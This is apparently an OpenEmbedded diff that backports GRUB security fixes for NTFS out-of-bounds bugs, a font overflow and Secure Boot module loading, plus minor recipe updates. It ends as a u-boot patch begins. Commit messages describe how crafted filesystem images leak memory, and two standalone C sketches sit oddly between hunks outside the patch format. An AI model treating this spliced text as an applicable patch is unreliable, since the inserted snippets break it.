+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=43651027d24e62a7a463254165e1e46e42aecdea]
+CVE: CVE-2023-4692
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/fs/ntfs.c | 18 +++++++++++++++++-
+ 1 file changed, 17 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c
+index 2f34f76..c8d3683 100644
+--- a/grub-core/fs/ntfs.c
++++ b/grub-core/fs/ntfs.c
+@@ -184,7 +184,7 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ }
+ if (at->attr_end)
+ {
+- grub_uint8_t *pa;
++ grub_uint8_t *pa, *pa_end;
+
+ at->emft_buf = grub_malloc (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR);
+ if (at->emft_buf == NULL)
+@@ -209,11 +209,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ }
+ at->attr_nxt = at->edat_buf;
+ at->attr_end = at->edat_buf + u32at (pa, 0x30);
++ pa_end = at->edat_buf + n;
+ }
+ else
+ {
+ at->attr_nxt = at->attr_end + u16at (pa, 0x14);
+ at->attr_end = at->attr_end + u32at (pa, 4);
++ pa_end = at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR);
+ }
+ at->flags |= GRUB_NTFS_AF_ALST;
+ while (at->attr_nxt < at->attr_end)
+@@ -230,6 +232,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ at->flags |= GRUB_NTFS_AF_GPOS;
+ at->attr_cur = at->attr_nxt;
+ pa = at->attr_cur;
++
++ if ((pa >= pa_end) || (pa_end - pa < 0x18))
++ {
++ grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list");
++ return NULL;
++ }
++
+ grub_set_unaligned32 ((char *) pa + 0x10,
+ grub_cpu_to_le32 (at->mft->data->mft_start));
+ grub_set_unaligned32 ((char *) pa + 0x14,
+@@ -240,6 +249,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ {
+ if (*pa != attr)
+ break;
++
++ if ((pa >= pa_end) || (pa_end - pa < 0x18))
++ {
++ grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list");
++ return NULL;
++ }
++
+ if (read_attr
+ (at, pa + 0x10,
+ u32at (pa, 0x10) * (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR),
+--
+2.25.1
+
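The check added above follows a common parser-hardening shape: before writing a fixed-size record at a cursor inside a buffer filled from disk, verify that the cursor still lies inside the buffer and leaves room for the record. A standalone sketch with an invented record size and layout, not the real NTFS structures:

#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RECORD_SIZE 0x18

static int
write_record (uint8_t *buf, size_t buf_len, uint8_t *cursor,
              uint32_t start_sector)
{
  uint8_t *end = buf + buf_len;

  if (cursor < buf || cursor >= end || (size_t) (end - cursor) < RECORD_SIZE)
    return -1;   /* would write out of bounds */

  memcpy (cursor + 0x10, &start_sector, sizeof (start_sector));
  return 0;
}

int
main (void)
{
  uint8_t buf[64] = { 0 };

  printf ("in range    : %d\n", write_record (buf, sizeof (buf), buf + 8, 42));
  printf ("out of range: %d\n", write_record (buf, sizeof (buf), buf + 60, 42));
  return 0;
}
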
diff --git a/meta/recipes-bsp/grub/files/CVE-2023-4693.patch b/meta/recipes-bsp/grub/files/CVE-2023-4693.patch
new file mode 100644
index 0000000000..1e6b6efdec
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2023-4693.patch
@@ -0,0 +1,62 @@
+From 0ed2458cc4eff6d9a9199527e2a0b6d445802f94 Mon Sep 17 00:00:00 2001
+From: Maxim Suhanov <dfirblog@gmail.com>
+Date: Mon, 28 Aug 2023 16:32:33 +0300
+Subject: [PATCH] fs/ntfs: Fix an OOB read when reading data from the resident
+ $DATA attribute
+
+When reading a file containing resident data, i.e., the file data is stored in
+the $DATA attribute within the NTFS file record, not in external clusters,
+there are no checks that this resident data actually fits the corresponding
+file record segment.
+
+When parsing a specially-crafted file system image, the current NTFS code will
+read the file data from an arbitrary, attacker-chosen memory offset and of
+arbitrary, attacker-chosen length.
+
+This allows an attacker to display arbitrary chunks of memory, which could
+contain sensitive information like password hashes or even plain-text,
+obfuscated passwords from BS EFI variables.
+
+This fix implements a check to ensure that resident data is read from the
+corresponding file record segment only.
+
+Fixes: CVE-2023-4693
+
+Reported-by: Maxim Suhanov <dfirblog@gmail.com>
+Signed-off-by: Maxim Suhanov <dfirblog@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=0ed2458cc4eff6d9a9199527e2a0b6d445802f94]
+CVE: CVE-2023-4693
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/fs/ntfs.c | 13 ++++++++++++-
+ 1 file changed, 12 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c
+index c8d3683..4d1fe42 100644
+--- a/grub-core/fs/ntfs.c
++++ b/grub-core/fs/ntfs.c
+@@ -401,7 +401,18 @@ read_data (struct grub_ntfs_attr *at, grub_uint8_t *pa, grub_uint8_t *dest,
+ {
+ if (ofs + len > u32at (pa, 0x10))
+ return grub_error (GRUB_ERR_BAD_FS, "read out of range");
+- grub_memcpy (dest, pa + u32at (pa, 0x14) + ofs, len);
++
++ if (u32at (pa, 0x10) > (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))
++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute too large");
++
++ if (pa >= at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))
++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range");
++
++ if (u16at (pa, 0x14) + u32at (pa, 0x10) >
++ (grub_addr_t) at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR) - (grub_addr_t) pa)
++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range");
++
++ grub_memcpy (dest, pa + u16at (pa, 0x14) + ofs, len);
+ return 0;
+ }
+
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/determinism.patch b/meta/recipes-bsp/grub/files/determinism.patch
new file mode 100644
index 0000000000..bd4e7188ec
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/determinism.patch
@@ -0,0 +1,56 @@
+The output in moddep.lst generated from syminfo.lst using genmoddep.awk is
+not deterministic since the order of the dependencies on each line can vary
+depending on how awk sorts the values in the array.
+
+Be deterministic in the output by sorting the dependencies on each line.
+
+Also, the output of the SOURCES lines in grub-core/Makefile.core.am, generated
+from grub-core/Makefile.core.def with gentpl.py is not deterministic due to
+missing sorting of the list used to generate it. Add such a sort.
+
+Also ensure the generated unidata.c file is deterministic by sorting the
+keys of the dict.
+
+Upstream-Status: Submitted [https://lists.gnu.org/archive/html/grub-devel/2023-06/index.html]
+Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: grub-2.04/grub-core/genmoddep.awk
+===================================================================
+--- grub-2.04.orig/grub-core/genmoddep.awk
++++ grub-2.04/grub-core/genmoddep.awk
+@@ -59,7 +59,9 @@ END {
+ }
+ modlist = ""
+ depcount[mod] = 0
+- for (depmod in uniqmods) {
++ n = asorti(uniqmods, w)
++ for (i = 1; i <= n; i++) {
++ depmod = w[i]
+ modlist = modlist " " depmod;
+ inverse_dependencies[depmod] = inverse_dependencies[depmod] " " mod
+ depcount[mod]++
+Index: grub-2.04/gentpl.py
+===================================================================
+--- grub-2.04.orig/gentpl.py
++++ grub-2.04/gentpl.py
+@@ -568,6 +568,7 @@ def foreach_platform_value(defn, platfor
+ for group in RMAP[platform]:
+ for value in defn.find_all(group + suffix):
+ r.append(closure(value))
++ r.sort()
+ return ''.join(r)
+
+ def platform_conditional(platform, closure):
+Index: grub-2.04/util/import_unicode.py
+===================================================================
+--- grub-2.04.orig/util/import_unicode.py
++++ grub-2.04/util/import_unicode.py
+@@ -174,7 +174,7 @@ infile.close ()
+
+ outfile.write ("struct grub_unicode_arabic_shape grub_unicode_arabic_shapes[] = {\n ")
+
+-for x in arabicsubst:
++for x in sorted(arabicsubst):
+ try:
+ if arabicsubst[x]['join'] == "DUAL":
+ outfile.write ("{0x%x, 0x%x, 0x%x, 0x%x, 0x%x},\n " % (arabicsubst[x][0], arabicsubst[x][1], arabicsubst[x][2], arabicsubst[x][3], arabicsubst[x][4]))
diff --git a/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch b/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch
new file mode 100644
index 0000000000..d4ba3cafc5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch
@@ -0,0 +1,117 @@
+From 1f511ae054fe42dce7aedfbfe0f234fa1e0a7a3e Mon Sep 17 00:00:00 2001
+From: Zhang Boyang <zhangboyang.id@gmail.com>
+Date: Fri, 5 Aug 2022 00:51:20 +0800
+Subject: [PATCH] font: Fix size overflow in grub_font_get_glyph_internal()
+
+The length of memory allocation and file read may overflow. This patch
+fixes the problem by using safemath macros.
+
+There is a lot of code repetition like "(x * y + 7) / 8". It is unsafe
+if overflow happens. This patch introduces grub_video_bitmap_calc_1bpp_bufsz().
+It is safe replacement for such code. It has safemath-like prototype.
+
+This patch also introduces grub_cast(value, pointer), it casts value to
+typeof(*pointer) then store the value to *pointer. It returns true when
+overflow occurs or false if there is no overflow. The semantics of arguments
+and return value are designed to be consistent with other safemath macros.
+
+Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9c76ec09ae08155df27cd237eaea150b4f02f532]
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/font/font.c | 17 +++++++++++++----
+ include/grub/bitmap.h | 18 ++++++++++++++++++
+ include/grub/safemath.h | 2 ++
+ 3 files changed, 33 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/font/font.c b/grub-core/font/font.c
+index 5edb477..df17dba 100644
+--- a/grub-core/font/font.c
++++ b/grub-core/font/font.c
+@@ -733,7 +733,8 @@ grub_font_get_glyph_internal (grub_font_t font, grub_uint32_t code)
+ grub_int16_t xoff;
+ grub_int16_t yoff;
+ grub_int16_t dwidth;
+- int len;
++ grub_ssize_t len;
++ grub_size_t sz;
+
+ if (index_entry->glyph)
+ /* Return cached glyph. */
+@@ -760,9 +761,17 @@ grub_font_get_glyph_internal (grub_font_t font, grub_uint32_t code)
+ return 0;
+ }
+
+- len = (width * height + 7) / 8;
+- glyph = grub_malloc (sizeof (struct grub_font_glyph) + len);
+- if (!glyph)
++ /* Calculate real struct size of current glyph. */
++ if (grub_video_bitmap_calc_1bpp_bufsz (width, height, &len) ||
++ grub_add (sizeof (struct grub_font_glyph), len, &sz))
++ {
++ remove_font (font);
++ return 0;
++ }
++
++ /* Allocate and initialize the glyph struct. */
++ glyph = grub_malloc (sz);
++ if (glyph == NULL)
+ {
+ remove_font (font);
+ return 0;
+diff --git a/include/grub/bitmap.h b/include/grub/bitmap.h
+index 5728f8c..0d9603f 100644
+--- a/include/grub/bitmap.h
++++ b/include/grub/bitmap.h
+@@ -23,6 +23,7 @@
+ #include <grub/symbol.h>
+ #include <grub/types.h>
+ #include <grub/video.h>
++#include <grub/safemath.h>
+
+ struct grub_video_bitmap
+ {
+@@ -79,6 +80,23 @@ grub_video_bitmap_get_height (struct grub_video_bitmap *bitmap)
+ return bitmap->mode_info.height;
+ }
+
++/*
++ * Calculate and store the size of data buffer of 1bit bitmap in result.
++ * Equivalent to "*result = (width * height + 7) / 8" if no overflow occurs.
++ * Return true when overflow occurs or false if there is no overflow.
++ * This function is intentionally implemented as a macro instead of
++ * an inline function. Although a bit awkward, it preserves data types for
++ * safemath macros and reduces macro side effects as much as possible.
++ *
++ * XXX: Will report false overflow if width * height > UINT64_MAX.
++ */
++#define grub_video_bitmap_calc_1bpp_bufsz(width, height, result) \
++({ \
++ grub_uint64_t _bitmap_pixels; \
++ grub_mul ((width), (height), &_bitmap_pixels) ? 1 : \
++ grub_cast (_bitmap_pixels / GRUB_CHAR_BIT + !!(_bitmap_pixels % GRUB_CHAR_BIT), (result)); \
++})
++
+ void EXPORT_FUNC (grub_video_bitmap_get_mode_info) (struct grub_video_bitmap *bitmap,
+ struct grub_video_mode_info *mode_info);
+
+diff --git a/include/grub/safemath.h b/include/grub/safemath.h
+index c17b89b..bb0f826 100644
+--- a/include/grub/safemath.h
++++ b/include/grub/safemath.h
+@@ -30,6 +30,8 @@
+ #define grub_sub(a, b, res) __builtin_sub_overflow(a, b, res)
+ #define grub_mul(a, b, res) __builtin_mul_overflow(a, b, res)
+
++#define grub_cast(a, res) grub_add ((a), 0, (res))
++
+ #else
+ #error gcc 5.1 or newer or clang 3.8 or newer is required
+ #endif
+--
+2.25.1
+
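grub_cast() as defined above is simply grub_add(value, 0, result), i.e. an overflow-checked conversion into the destination's type via __builtin_add_overflow(). A tiny standalone illustration of the idiom, with made-up values:

#include <stdint.h>
#include <stdio.h>

#define checked_cast(value, resp) __builtin_add_overflow ((value), 0, (resp))

int
main (void)
{
  uint64_t pixels = 70000;   /* e.g. width * height of a glyph bitmap */
  uint16_t w16;

  if (checked_cast (pixels, &w16))
    puts ("rejected: value does not fit the destination type");

  pixels = 1200;
  if (!checked_cast (pixels, &w16))
    printf ("stored %u\n", (unsigned) w16);

  return 0;
}
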
diff --git a/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch b/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch
new file mode 100644
index 0000000000..504352b4e3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch
@@ -0,0 +1,107 @@
+From b5a6aa7d77439bfeb75f200abffe15c6f685c907 Mon Sep 17 00:00:00 2001
+From: Matthew Garrett <mjg@redhat.com>
+Date: Mon, 13 Jan 2014 12:13:09 +0000
+Subject: Don't permit loading modules on UEFI secure boot
+
+Author: Colin Watson <cjwatson@ubuntu.com>
+Origin: vendor, http://pkgs.fedoraproject.org/cgit/grub2.git/tree/grub-2.00-no-insmod-on-sb.patch
+Forwarded: no
+Last-Update: 2013-12-25
+
+Patch-Name: no-insmod-on-sb.patch
+
+Upstream-Status: Inappropriate [other, https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch]
+
+Backport of a Debian (and Fedora) patch implementing a way to get secure boot status
+for CVE-2020-14372_4.patch. The upstream solution has too many dependencies to backport.
+Source: https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch
+
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/dl.c | 13 +++++++++++++
+ grub-core/kern/efi/efi.c | 28 ++++++++++++++++++++++++++++
+ include/grub/efi/efi.h | 1 +
+ 3 files changed, 42 insertions(+)
+
+diff --git a/grub-core/kern/dl.c b/grub-core/kern/dl.c
+index 48eb5e7b6..074dfc3c6 100644
+--- a/grub-core/kern/dl.c
++++ b/grub-core/kern/dl.c
+@@ -38,6 +38,10 @@
+ #define GRUB_MODULES_MACHINE_READONLY
+ #endif
+
++#ifdef GRUB_MACHINE_EFI
++#include <grub/efi/efi.h>
++#endif
++
+
+
+ #pragma GCC diagnostic ignored "-Wcast-align"
+@@ -686,6 +690,15 @@ grub_dl_load_file (const char *filename)
+ void *core = 0;
+ grub_dl_t mod = 0;
+
++#ifdef GRUB_MACHINE_EFI
++ if (grub_efi_secure_boot ())
++ {
++ grub_error (GRUB_ERR_ACCESS_DENIED,
++ "Secure Boot forbids loading module from %s", filename);
++ return 0;
++ }
++#endif
++
+ grub_boot_time ("Loading module %s", filename);
+
+ file = grub_file_open (filename, GRUB_FILE_TYPE_GRUB_MODULE);
+diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
+index 6e1ceb905..96204e39b 100644
+--- a/grub-core/kern/efi/efi.c
++++ b/grub-core/kern/efi/efi.c
+@@ -273,6 +273,34 @@ grub_efi_get_variable (const char *var, const grub_efi_guid_t *guid,
+ return NULL;
+ }
+
++grub_efi_boolean_t
++grub_efi_secure_boot (void)
++{
++ grub_efi_guid_t efi_var_guid = GRUB_EFI_GLOBAL_VARIABLE_GUID;
++ grub_size_t datasize;
++ char *secure_boot = NULL;
++ char *setup_mode = NULL;
++ grub_efi_boolean_t ret = 0;
++
++ secure_boot = grub_efi_get_variable ("SecureBoot", &efi_var_guid, &datasize);
++
++ if (datasize != 1 || !secure_boot)
++ goto out;
++
++ setup_mode = grub_efi_get_variable ("SetupMode", &efi_var_guid, &datasize);
++
++ if (datasize != 1 || !setup_mode)
++ goto out;
++
++ if (*secure_boot && !*setup_mode)
++ ret = 1;
++
++ out:
++ grub_free (secure_boot);
++ grub_free (setup_mode);
++ return ret;
++}
++
+ #pragma GCC diagnostic ignored "-Wcast-align"
+
+ /* Search the mods section from the PE32/PE32+ image. This code uses
+diff --git a/include/grub/efi/efi.h b/include/grub/efi/efi.h
+index e90e00dc4..a237952b3 100644
+--- a/include/grub/efi/efi.h
++++ b/include/grub/efi/efi.h
+@@ -82,6 +82,7 @@ EXPORT_FUNC (grub_efi_set_variable) (const char *var,
+ const grub_efi_guid_t *guid,
+ void *data,
+ grub_size_t datasize);
++grub_efi_boolean_t EXPORT_FUNC (grub_efi_secure_boot) (void);
+ int
+ EXPORT_FUNC (grub_efi_compare_device_paths) (const grub_efi_device_path_t *dp1,
+ const grub_efi_device_path_t *dp2);
diff --git a/meta/recipes-bsp/grub/grub2.inc b/meta/recipes-bsp/grub/grub2.inc
index 4ec7d0b0fc..bea03f4fc1 100644
--- a/meta/recipes-bsp/grub/grub2.inc
+++ b/meta/recipes-bsp/grub/grub2.inc
@@ -13,6 +13,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
CVE_PRODUCT = "grub2"
+# Applies only to RHEL
+CVE_CHECK_WHITELIST += "CVE-2019-14865"
+# Applies only to SUSE
+CVE_CHECK_WHITELIST += "CVE-2021-46705"
+
SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \
file://0001-Disable-mfpmath-sse-as-well-when-SSE-is-disabled.patch \
file://autogen.sh-exclude-pc.patch \
@@ -27,7 +32,86 @@ SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \
file://script-Remove-unused-fields-from-grub_script_functio.patch \
file://CVE-2020-15706-script-Avoid-a-use-after-free-when-redefining-a-func.patch \
file://CVE-2020-15707-linux-Fix-integer-overflows-in-initrd-size-handling.patch \
-"
+ file://determinism.patch \
+ file://no-insmod-on-sb.patch \
+ file://CVE-2020-14372_1.patch \
+ file://CVE-2020-14372_2.patch \
+ file://CVE-2020-14372_3.patch \
+ file://CVE-2020-14372_4.patch \
+ file://CVE-2020-14372_5.patch \
+ file://CVE-2020-14372.patch \
+ file://CVE-2020-27779.patch \
+ file://CVE-2020-27779_2.patch \
+ file://CVE-2020-27779_3.patch \
+ file://CVE-2020-27779_4.patch \
+ file://CVE-2020-27779_5.patch \
+ file://CVE-2020-27779_6.patch \
+ file://CVE-2020-27779_7.patch \
+ file://CVE-2020-25632.patch \
+ file://CVE-2020-25647.patch \
+ file://0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch \
+ file://0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch \
+ file://0003-net-tftp-Fix-dangling-memory-pointer.patch \
+ file://0004-kern-parser-Fix-resource-leak-if-argc-0.patch \
+ file://0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch \
+ file://0006-kern-efi-Fix-memory-leak-on-failure.patch \
+ file://0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch \
+ file://0008-gnulib-regexec-Resolve-unused-variable.patch \
+ file://0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch \
+ file://0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch \
+ file://0011-gnulib-regexec-Fix-possible-null-dereference.patch \
+ file://0012-gnulib-regcomp-Fix-uninitialized-re_token.patch \
+ file://0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch \
+ file://0014-zstd-Initialize-seq_t-structure-fully.patch \
+ file://0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch \
+ file://0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch \
+ file://0017-disk-ldm-If-failed-then-free-vg-variable-too.patch \
+ file://0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch \
+ file://0019-disk-cryptodisk-Fix-potential-integer-overflow.patch \
+ file://0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch \
+ file://0021-zfs-Fix-possible-negative-shift-operation.patch \
+ file://0022-zfs-Fix-resource-leaks-while-constructing-path.patch \
+ file://0023-zfs-Fix-possible-integer-overflows.patch \
+ file://0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch \
+ file://0025-affs-Fix-memory-leaks.patch \
+ file://0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch \
+ file://0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch \
+ file://0028-syslinux-Fix-memory-leak-while-parsing.patch \
+ file://0029-normal-completion-Fix-leaking-of-memory-when-process.patch \
+ file://0030-commands-hashsum-Fix-a-memory-leak.patch \
+ file://0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch \
+ file://0032-video-fb-fbfill-Fix-potential-integer-overflow.patch \
+ file://0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch \
+ file://0034-video-fb-video_fb-Fix-possible-integer-overflow.patch \
+ file://0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch \
+ file://0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch \
+ file://0037-loader-bsd-Check-for-NULL-arg-up-front.patch \
+ file://0038-loader-xnu-Fix-memory-leak.patch \
+ file://0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch \
+ file://0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch \
+ file://0041-util-grub-install-Fix-NULL-pointer-dereferences.patch \
+ file://0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch \
+ file://0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch \
+ file://0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch \
+ file://0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch \
+ file://0046-script-execute-Avoid-crash-when-using-outside-a-func.patch \
+ file://CVE-2021-3981.patch \
+ file://CVE-2021-3695.patch \
+ file://CVE-2021-3696.patch \
+ file://CVE-2021-3697.patch \
+ file://CVE-2022-28733.patch \
+ file://CVE-2022-28734.patch \
+ file://CVE-2022-28736.patch \
+ file://CVE-2022-28735.patch \
+ file://font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch \
+ file://CVE-2022-2601.patch \
+ file://CVE-2022-3775.patch \
+ file://CVE-2020-27749.patch \
+ file://CVE-2021-20225.patch \
+ file://CVE-2021-20233.patch \
+ file://CVE-2023-4692.patch \
+ file://CVE-2023-4693.patch \
+ "
SRC_URI[md5sum] = "5ce674ca6b2612d8939b9e6abed32934"
SRC_URI[sha256sum] = "f10c85ae3e204dbaec39ae22fa3c5e99f0665417e91c2cb49b7e5031658ba6ea"
@@ -46,6 +130,8 @@ GRUBPLATFORM ??= "pc"
inherit autotools gettext texinfo pkgconfig
+CFLAGS_remove = "-O2"
+
EXTRA_OECONF = "--with-platform=${GRUBPLATFORM} \
--disable-grub-mkfont \
--program-prefix="" \
diff --git a/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch b/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch
new file mode 100644
index 0000000000..47c7ec4170
--- /dev/null
+++ b/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch
@@ -0,0 +1,36 @@
+From ecdcf0df6c28c65ca6d1e5638726e13e373c76c5 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Wed, 11 Nov 2020 22:58:55 -0800
+Subject: [PATCH] Fix cross compilation using autoconf detected AR
+
+currently it's using the 'ar' program from the build host, which is not expected;
+we need to respect the AR passed in the environment
+
+Upstream-Status: Pending
+
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ configure.in | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/configure.in b/configure.in
+index 4ddbe8b..b7c3c31 100644
+--- a/configure.in
++++ b/configure.in
+@@ -84,6 +84,13 @@ AC_ARG_ENABLE(syslog,
+ ])
+
+ dnl Checks for programs.
++m4_ifndef([AC_PROG_AR],[dnl
++ AN_MAKEVAR([AR], [AC_PROG_AR])
++ AN_PROGRAM([ar], [AC_PROG_AR])
++ AC_DEFUN([AC_PROG_AR],
++ [AC_CHECK_TOOL(AR, ar, :)])
++])
++AC_PROG_AR
+ AC_PROG_CC
+ AC_PROG_GCC_TRADITIONAL
+ dnl AC_PROG_INSTALL included in AM_INIT_AUTOMAKE
+--
+2.29.2
+
diff --git a/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb b/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
index 4129237c59..54c431eeb3 100644
--- a/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
+++ b/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
@@ -19,6 +19,7 @@ SRC_URI = "http://www.ohse.de/uwe/releases/lrzsz-${PV}.tar.gz \
file://lrzsz-check-locale.h.patch \
file://cve-2018-10195.patch \
file://include.patch \
+ file://0001-Fix-cross-compilation-using-autoconf-detected-AR.patch \
"
SRC_URI[md5sum] = "b5ce6a74abc9b9eb2af94dffdfd372a4"
diff --git a/meta/recipes-bsp/opensbi/opensbi_0.6.bb b/meta/recipes-bsp/opensbi/opensbi_0.6.bb
index 56f2d4b915..972d8de17d 100644
--- a/meta/recipes-bsp/opensbi/opensbi_0.6.bb
+++ b/meta/recipes-bsp/opensbi/opensbi_0.6.bb
@@ -1,5 +1,6 @@
SUMMARY = "RISC-V Open Source Supervisor Binary Interface (OpenSBI)"
DESCRIPTION = "OpenSBI aims to provide an open-source and extensible implementation of the RISC-V SBI specification for a platform specific firmware (M-mode) and a general purpose OS, hypervisor or bootloader (S-mode or HS-mode). OpenSBI implementation can be easily extended by RISC-V platform or System-on-Chip vendors to fit a particular hadware configuration."
+HOMEPAGE = "https://github.com/riscv/opensbi"
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://COPYING.BSD;md5=42dd9555eb177f35150cf9aa240b61e5"
@@ -8,7 +9,7 @@ require opensbi-payloads.inc
inherit autotools-brokensep deploy
SRCREV = "ac5e821d50be631f26274765a59bc1b444ffd862"
-SRC_URI = "git://github.com/riscv/opensbi.git \
+SRC_URI = "git://github.com/riscv/opensbi.git;branch=master;protocol=https \
file://0001-Makefile-Don-t-specify-mabi-or-march.patch \
"
diff --git a/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb b/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
index cac09101c4..fa3b993788 100644
--- a/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
+++ b/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
@@ -19,9 +19,12 @@ PACKAGECONFIG[manpages] = "--enable-doc, --disable-doc, libxslt-native xmlto-nat
RDEPENDS_${PN} = "grep bash"
+EXTRA_OECONF = "--libdir=${nonarch_libdir}"
+
do_configure_prepend () {
( cd ${S}; autoreconf -f -i -s )
}
-FILES_${PN} += "${libdir}/${BPN}/*"
+FILES_${PN} += "${nonarch_libdir}/${BPN}/*"
FILES_${PN}-dbg += "${datadir}/doc/pm-utils/README.debugging"
+FILES_${PN}-dev += "${nonarch_libdir}/pkgconfig/pm-utils.pc"
diff --git a/meta/recipes-bsp/u-boot/files/CVE-2020-10648-1.patch b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-1.patch
new file mode 100644
index 0000000000..d784452b44
--- /dev/null
+++ b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-1.patch
@@ -0,0 +1,98 @@
+From 67acad3db71bb372458fbb8a77749f5eb88aa324 Mon Sep 17 00:00:00 2001
+From: Simon Glass <sjg@chromium.org>
+Date: Wed, 18 Mar 2020 11:44:01 -0600
+Subject: [PATCH] image: Check hash-nodes when checking configurations
+
+It is currently possible to use a different configuration's signature and
+thus bypass the configuration check. Make sure that the configuration node
+that was hashed matches the one being checked, to catch this problem.
+
+Also add a proper function comment to fit_config_check_sig() and make it
+static.
+
+Signed-off-by: Simon Glass <sjg@chromium.org>
+
+CVE: CVE-2020-10648
+Upstream-Status: Backport[https://github.com/u-boot/u-boot/commit/67acad3db71bb372458fbb8a77749f5eb88aa324]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ common/image-sig.c | 36 +++++++++++++++++++++++++++++++++---
+ 1 file changed, 33 insertions(+), 3 deletions(-)
+
+diff --git a/common/image-sig.c b/common/image-sig.c
+index 13ccd50bc5..03143a4040 100644
+--- a/common/image-sig.c
++++ b/common/image-sig.c
